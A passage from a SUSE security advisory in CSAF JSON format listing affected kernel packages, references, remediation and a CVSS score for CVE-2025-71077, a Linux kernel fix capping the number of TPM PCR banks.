"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
